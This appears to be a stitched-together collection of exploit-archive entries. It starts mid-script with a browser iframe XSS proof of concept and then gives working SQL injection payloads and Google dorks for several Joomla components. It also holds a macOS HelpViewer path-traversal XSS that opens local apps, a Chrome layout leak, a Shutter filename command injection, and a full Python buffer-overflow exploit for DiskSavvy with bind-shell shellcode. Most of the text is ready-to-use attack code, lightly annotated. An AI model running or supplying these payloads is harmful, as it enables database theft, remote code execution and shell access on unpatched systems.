let f = document.body.appendChild(document.createElement("iframe"));
let a = f.contentDocument.documentElement.appendChild(document.createElement("iframe"));
a.contentWindow.onunload = () => {
let b = f.contentDocument.documentElement.appendChild(document.createElement("iframe"));
b.contentWindow.onunload = () => {
f.src = "javascript:''";
let c = f.contentDocument.documentElement.appendChild(document.createElement("iframe"));
c.contentWindow.onunload = () => {
f.src = "javascript:''";
let d = f.contentDocument.appendChild(document.createElement("iframe"));
d.contentWindow.onunload = () => {
// Innermost handler: the function body is base64-encoded (presumably to
// avoid quoting problems inside the javascript: URL); it only reports
// document.location to show which origin the code ran in.
f.src = "javascript:setTimeout(eval(atob('" + btoa("(" +function () {
alert(document.location);
} + ")") + "')), 0);";
};
};
};
};
// Navigating f to https://abc.xyz/ starts the unload chain above.
f.src = "https://abc.xyz/";
}
// Entry point: the PoC runs as soon as the script is parsed.
main();
/*
b JSC::globalFuncParseFloat
*/
</script>
</body>
# # # # #
# Exploit Title: Joomla! Component Community Polls v4.5.0 - SQL Injection
# Google Dork: inurl:index.php?option=com_communitypolls
# Date: 24.02.2017
# Vendor Homepage: http://corejoomla.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/polls/community-polls/
# Demo: http://demo.corejoomla.com/polls.html
# Version: 4.5.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# index.php?option=com_communitypolls&view=search
# http://localhost/[PATH]/?list_filter=Ihsan_Sencan&list_filter_field=author&filter_all_keywords=1&filter_order=a.catid&filter_order_Dir=desc&catid[]=[SQL]
# 66+AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x496873616e2053656e63616e,0x7e,0x27,CAST(schema_name+AS+CHAR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.SCHEMATA+WHERE+table_schema!=DATABASE()+LIMIT+1,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),+FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1
# # # # #
# # # # #
# Exploit Title: Joomla! Component Community Surveys v4.3 - SQL Injection
# Google Dork: inurl:index.php?option=com_communitysurveys
# Date: 24.02.2017
# Vendor Homepage: http://corejoomla.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/surveys/community-surveys/
# Demo: http://demo.corejoomla.com/surveys.html
# Version: 4.3
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# index.php?option=com_communitysurveys&view=search
# http://localhost/[PATH]/?list_filter=Ihsan_Sencan&list_filter_field=author&filter_all_keywords=1&filter_order=a.catid&filter_order_Dir=desc&catid[]=[SQL]
# 66+AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x496873616e2053656e63616e,0x7e,0x27,CAST(schema_name+AS+CHAR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.SCHEMATA+WHERE+table_schema!=DATABASE()+LIMIT+1,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),+FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1
# # # # #
# # # # #
# Exploit Title: Joomla! Component AJAX Search for K2 v2.2 - SQL Injection
# Google Dork: inurl:index.php?option=com_k2ajaxsearch
# Date: 24.02.2017
# Vendor Homepage: http://taleia.software/
# Software Buy: https://extensions.joomla.org/extensions/extension/extension-specific/k2-extensions/ajax-search-for-k2/
# Demo: http://k2ajaxsearch.taleia.software/demo/
# Version: 2.2
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/?searchword=Ihsan_Sencan&option=com_k2ajaxsearch&=[SQL]
# http://localhost/[PATH]/?searchword=Ihsan_Sencan&option=com_k2ajaxsearch&module_id=101&efields[][]=[SQL]
# http://localhost/[PATH]/?searchword=Ihsan_Sencan&option=com_k2ajaxsearch&module_id=[SQL]&efields[][]=Ihsan_Sencan
# # # # #
# # # # #
# Exploit Title: Joomla! Component JO Facebook Gallery v4.5 - SQL Injection
# Google Dork: inurl:index.php?option=com_jofacebookgallery
# Date: 24.02.2017
# Vendor Homepage: http://joomcore.com/joomla32/
# Software Buy: https://extensions.joomla.org/extensions/extension/social-web/social-media/jo-facebook-gallery/
# Demo: http://demo.joomcore.com/joomla32/
# Version: 4.5
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_jofacebookgallery&view=category&id=[SQL]
# http://localhost/[PATH]/index.php?option=com_jofacebookgallery&view=albums&id=[SQL]
# http://localhost/[PATH]/index.php?option=com_jofacebookgallery&view=photo&id=[SQL]
# # # # #
# # # # #
# Exploit Title: Joomla! Component JooDatabase v3.1.0 - SQL Injection
# Google Dork: inurl:index.php?option=com_joodb
# Date: 24.02.2017
# Vendor Homepage: https://feenders.de/
# Software Buy: https://extensions.joomla.org/extensions/extension/core-enhancements/coding-a-scripts-integration/joodatabase/
# Demo: https://joodb.feenders.de/db-example.html
# Version: 3.1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_joodb&view=catalog&format=html&reset=false&Itemid=321&task=&search=[SQL]&searchfield=Ihsan_Sencan
# http://localhost/[PATH]/index.php?option=com_joodb&view=catalog&format=html&reset=false&Itemid=321&task=&search=Ihsan_Sencan&searchfield=[SQL]
# # # # #
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1040
HelpViewer is an application that uses WebView to show a help file.
You can see it simply by the command:
open /Applications/Safari.app/Contents/Resources/Safari.help
or using "help:" scheme:
help:openbook=com.apple.safari.help
help:///Applications/Safari.app/Contents/Resources/Safari.help/Contents/Resources/index.html
HelpViewer's WebView has an internal protocol handler "x-help-script" that can be used to open an arbitrary local file. Therefore, if we can run arbitrary JavaScript code, we win easily and, of course, we can also read an arbitrary local file with an XMLHttpRequest.
HelpViewer checks whether the URL's path is inside a valid help file, but this check can be bypassed with a double-encoded "../".
PoC:
document.location = "help:///Applications/Safari.app/Contents/Resources/Safari.help/%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f/System/Library/PrivateFrameworks/Tourist.framework/Versions/A/Resources/en.lproj/offline.html?redirect=javascript%253adocument.write(1)";
The attached poc will pop up a Calculator.
Tested on macOS Sierra 10.12.1 (16B2659).
-->
<script>
/*
OSX: HelpViewer XSS leads to arbitrary file execution and arbitrary file read.
HelpViewer is an application that uses WebView to show a help file.
You can see it simply by the command:
open /Applications/Safari.app/Contents/Resources/Safari.help
or using "help:" scheme:
help:openbook=com.apple.safari.help
help:///Applications/Safari.app/Contents/Resources/Safari.help/Contents/Resources/index.html
HelpViewer's WebView has an internal protocol handler "x-help-script" that can be used to open an arbitrary local file. Therefore, if we can run arbitrary JavaScript code, we win easily and, of course, we can also read an arbitrary local file with an XMLHttpRequest.
HelpViewer checks whether the URL's path is inside a valid help file, but this check can be bypassed with a double-encoded "../".
PoC:
document.location = "help:///Applications/Safari.app/Contents/Resources/Safari.help/%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f/System/Library/PrivateFrameworks/Tourist.framework/Versions/A/Resources/en.lproj/offline.html?redirect=javascript%253adocument.write(1)";
The attached poc will pop up a Calculator.
Tested on macOS Sierra 10.12.1 (16B2659).
*/
// PoC for the HelpViewer path-check bypass described above. Navigates to a
// help: URL whose path contains multiply-encoded "../" segments ("%25252f")
// and whose redirect parameter carries a javascript: payload. Defensive note:
// a path-containment check like this has to run on the fully decoded,
// canonicalized path, otherwise encoded traversal sequences slip past it.
function main() {
// Runs inside HelpViewer's WebView after the redirect; its source is shipped
// base64-encoded in `url` below.
function second() {
var f = document.createElement("iframe");
f.onload = () => {
// x-help-script handler: per the write-up it can open an arbitrary local file
// (here Calculator.app, as a visible indicator).
f.contentDocument.location = "x-help-script://com.apple.machelp/scpt/OpnApp.scpt?:Applications:Calculator.app";
};
f.src = "help:openbook=com.apple.safari.help";
document.documentElement.appendChild(f);
}
// "%253a" is an encoded ':' — the redirect value is presumably decoded more than once.
var url = "javascript%253aeval(atob('" + btoa(second.toString()) + "'));\nsecond();";
document.location = "help:///Applications/Safari.app/Contents/Resources/Safari.help/%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f/System/Library/PrivateFrameworks/Tourist.framework/Versions/A/Resources/en.lproj/offline.html?redirect=" + url;
}
// Entry point: the PoC runs as soon as the script is parsed.
main();
</script>
# # # # #
# Exploit Title: Joomla! Component MultiTier v3.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_multitier
# Date: 23.02.2017
# Vendor Homepage: http://www.beesto.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/ads-a-affiliates/affiliate-systems/multitier/
# Demo: http://www.beesto.com/extensions/13-j-multitier/40-demo
# Version: 3.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/index.php/component/multitier/?mtpage=takecodel&tid=1&lid=[SQL]
# -66'+/*!50000union*/+select+1,0x496873616e2053656e63616e,3,4,5,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),7,8+-- -
# http://localhost/[PATH]/index.php/component/multitier/?mtpage=link_preview&id=[SQL]
# -66'+/*!50000union*/+select+1,0x496873616e2053656e63616e,3,4,5,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),7,8+-- -
# http://localhost/[PATH]/index.php/component/multitier/?mtpage=takecodeb&tid=1&bid=[SQL]
# -66'+/*!50000union*/+select+(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),2,3+-- -
# # # # #
# # # # #
# Exploit Title: Joomla! Component UserExtranet v1.3.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_userextranet
# Date: 23.02.2017
# Vendor Homepage: http://www.beesto.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/access-a-security/site-access/userextranet/
# Demo: http://www.beesto.com/extensions/18-userextranet/93-demo
# Version: 1.3.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/index.php?option=com_userextranet&view=folders&fid=[SQL]
# 66+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
# # # # #
# # # # #
# Exploit Title: Joomla! Component Store for K2 v3.8.2 - SQL Injection
# Google Dork: inurl:index.php?option=com_k2store
# Date: 23.02.2017
# Vendor Homepage: http://jworkplace.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/extension-specific/k2-extensions/store-for-k2/
# Demo: http://k2store.jworkplace.com/
# Version: 3.8.2
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_k2store&view=checkout&task=getCountry&=[SQL]
# # # # #
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1024
Chrome bug:
https://bugs.chromium.org/p/chromium/issues/detail?id=671328
PoC:
-->
<style>
content { contain: size layout; }
</style>
<script>
// Triggered from <body onload>: selects the whole document, then empties the
// text of the <option> (id "opt") while it is selected inside a <content>
// element styled with `contain: size layout`. Per the note at the end of this
// section this is a layout bug, and the leaked data is not reachable through
// DOM calls.
function leak() {
document.execCommand("selectAll");
opt.text = "";
}
</script>
<body onload=leak()>
<content>
<select>
<option id="opt">aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</option>
</select>
</content>
<!--
Since this is a layout bug, as far as I know the leaked data can't be obtained via DOM calls; however, it's possible to obtain it using tricks like the unicode-range CSS descriptor (credits to Jann Horn for coming up with that approach), which is likely sufficient to turn this into an ASLR bypass.
-->
# Exploit Title: Shutter user-assisted remote code execution
# Date: 2016-12-26
# Software Link: http://shutter-project.org/
# Version: 0.93.1
# Tested on: Ubuntu, Debian
# Exploit Author: Prajith P
# Website: http://prajith.in/
# Author Mail: me@prajith.in
# CVE: CVE-2016-10081
1. Description.
/usr/bin/shutter in Shutter through 0.93.1 allows user-assisted remote
attackers to execute arbitrary commands via a crafted image name that is
mishandled during a "Run a plugin" action.
2. Proof of concept.
1) Rename an image to something like "$(firefox)"
2) Open the renamed file in shutter
3) Click the "Run a plugin" option and select any plugin from the list and click "Run"
3. Solution:
https://bugs.launchpad.net/shutter/+bug/1652600
Thanks,
Prajithh
# Exploit Title: DiskSavvy Enterprise 9.4.18 - Remote buffer overflow - SEH overwrite with WoW64 egghunters
# Date: 2017-02-22
# Exploit Author: Peter Baris
# Vendor Homepage: www.saptech-erp.com.au
# Software Link: http://www.disksavvy.com/downloads.html
# Version: 9.4.18
# Tested on: Windows 7 Pro SP1 x64 (fully patched) and Windows 10 Pro x64
# WoW64 egghunters are in use in this exploit, meaning it works only on specific 64-bit operating systems
# Original Win7 egghunter: https://www.corelan.be/index.php/2011/11/18/wow64-egghunter/ - but I modified it for this exploit
# Win10 WoW64 egghunter only supports x86_64 platform - developed by Peter Baris based on corelan's Win7 version
# If you require a WoW64 egghunter for additional windows versions, contact me through my website http://saptech-erp.com.au/services.php
# Python 2 script (print statements): sends a single oversized HTTP GET to the
# DiskSavvy web interface on port 80. The comments below describe the request
# layout so the traffic can be recognised; they do not alter the payload.
import socket
import sys
try:
host = sys.argv[1]
# NOTE: `os` here is the target Windows version string ("win7"/"win10"), not
# the os module; the name shadows a standard-library module and is easy to misread.
os = sys.argv[2]
port = 80
except IndexError:
print "[+] Usage %s <host> win7/win10" % sys.argv[0]
print "[i] Example: dsavvy.py localhost win10"
sys.exit()
# 355 bytes bind shell, PORT 4444, bad chars \x09\x0a\x0d\x20
shell = ("\xba\x6c\xb1\x12\x02\xd9\xc7\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
"\x53\x83\xee\xfc\x31\x56\x0e\x03\x3a\xbf\xf0\xf7\x3e\x57\x76"
"\xf7\xbe\xa8\x17\x71\x5b\x99\x17\xe5\x28\x8a\xa7\x6d\x7c\x27"
"\x43\x23\x94\xbc\x21\xec\x9b\x75\x8f\xca\x92\x86\xbc\x2f\xb5"
"\x04\xbf\x63\x15\x34\x70\x76\x54\x71\x6d\x7b\x04\x2a\xf9\x2e"
"\xb8\x5f\xb7\xf2\x33\x13\x59\x73\xa0\xe4\x58\x52\x77\x7e\x03"
"\x74\x76\x53\x3f\x3d\x60\xb0\x7a\xf7\x1b\x02\xf0\x06\xcd\x5a"
"\xf9\xa5\x30\x53\x08\xb7\x75\x54\xf3\xc2\x8f\xa6\x8e\xd4\x54"
"\xd4\x54\x50\x4e\x7e\x1e\xc2\xaa\x7e\xf3\x95\x39\x8c\xb8\xd2"
"\x65\x91\x3f\x36\x1e\xad\xb4\xb9\xf0\x27\x8e\x9d\xd4\x6c\x54"
"\xbf\x4d\xc9\x3b\xc0\x8d\xb2\xe4\x64\xc6\x5f\xf0\x14\x85\x37"
"\x35\x15\x35\xc8\x51\x2e\x46\xfa\xfe\x84\xc0\xb6\x77\x03\x17"
"\xb8\xad\xf3\x87\x47\x4e\x04\x8e\x83\x1a\x54\xb8\x22\x23\x3f"
"\x38\xca\xf6\xaa\x30\x6d\xa9\xc8\xbd\xcd\x19\x4d\x6d\xa6\x73"
"\x42\x52\xd6\x7b\x88\xfb\x7f\x86\x33\x12\xdc\x0f\xd5\x7e\xcc"
"\x59\x4d\x16\x2e\xbe\x46\x81\x51\x94\xfe\x25\x19\xfe\x39\x4a"
"\x9a\xd4\x6d\xdc\x11\x3b\xaa\xfd\x25\x16\x9a\x6a\xb1\xec\x4b"
"\xd9\x23\xf0\x41\x89\xc0\x63\x0e\x49\x8e\x9f\x99\x1e\xc7\x6e"
"\xd0\xca\xf5\xc9\x4a\xe8\x07\x8f\xb5\xa8\xd3\x6c\x3b\x31\x91"
"\xc9\x1f\x21\x6f\xd1\x1b\x15\x3f\x84\xf5\xc3\xf9\x7e\xb4\xbd"
"\x53\x2c\x1e\x29\x25\x1e\xa1\x2f\x2a\x4b\x57\xcf\x9b\x22\x2e"
"\xf0\x14\xa3\xa6\x89\x48\x53\x48\x40\xc9\x63\x03\xc8\x78\xec"
"\xca\x99\x38\x71\xed\x74\x7e\x8c\x6e\x7c\xff\x6b\x6e\xf5\xfa"
"\x30\x28\xe6\x76\x28\xdd\x08\x24\x49\xf4")
# Pieces of the overflow buffer; they are concatenated into `exploit` below.
crash = "\x41" * 2487
retn = "\x38\x2e\x14\x10" # 0x10142e38 pop edi pop esi ret
filler = "\x44" * (2505-334-300-100)
nseh = "\xeb\x08\x90\x90"
stack_fill="\x41"*100
nops="\x90"*8
egg = "t00wt00w"
# The egghunter variant is chosen by the second command-line argument.
if os == "win7":
wow64_egghunter = ("\x66\x8c\xcb\x80\xfb\x23\x75\x08\x31\xdb\x53\x53\x53\x53\xb3\xc0"
"\x33\xd2"
"\x66\x81\xca\xff\x0f\x42\x52\x80\xfb\xc0\x74\x19\x6a\x02\x58\xcd"
"\x2e\x5a\x3c\x05\x74\xef\xb8"
"\x74\x30\x30\x77"
"\x89\xd7\xaf\x75\xe5\xaf\x75\xe2\xff\xe7\x6a\x26\x58\x31\xc9\x89"
"\xe2\x64\xff\x13\x5e\x5a\xeb\xdf")
elif os == "win10":
wow64_egghunter = ("\x66\x8c\xcb\x80\xfb\x23\x75\x10\x31\xd2\x66\x81\xca\xff\x0f\x31"
"\xdb\x42\x52\x53\x53\x53\xb3\xc0\x80\xfb\xc0\x74\x13\x3c\x05\x74\xee\xb8"
"\x74\x30\x30\x77"
"\x89\xd7\xaf\x75\xe4\xaf\x75\xe1\xff\xe7"
"\x6a\x29\x58\x64\xff\x13\x83\xc4\x0c\x5a\xeb\xe1")
else:
# NOTE: uses the builtin exit() here but sys.exit() in the usage branch above.
print "[!] This windows version is not supported yet"
exit(0)
# Request-target layout: 2487 x 'A', SEH overwrite, egghunter, egg, shellcode, filler.
# Detection hint: a GET whose path is several KB of 0x41 bytes followed by
# non-printable data, carrying a Content-Length header but no request body.
exploit = crash + nseh + retn + nops + wow64_egghunter + stack_fill + egg + nops + shell + filler
buffer = "GET /"+exploit+" HTTP/1.1\r\n"
buffer+= "Host: "+host+"\r\n"
buffer+= "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:44.0) Gecko/20100101 Firefox/44.0 Iceweasel/44.0.2\r\n"
buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
buffer+="Accept-Language: en-US,en;q=0.5\r\n"
buffer+="Accept-Encoding: gzip, deflate\r\n"
buffer+="Referer: http://"+host+"/login\r\n"
buffer+="Connection: keep-alive\r\n"
buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
# Content-Length is declared as 5900, but nothing follows the blank line.
buffer+="Content-Length: 5900\r\n\r\n"
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# socket.connect() returns None; the `connect` variable is never used.
connect=s.connect((host,port))
s.send(buffer)
s.close()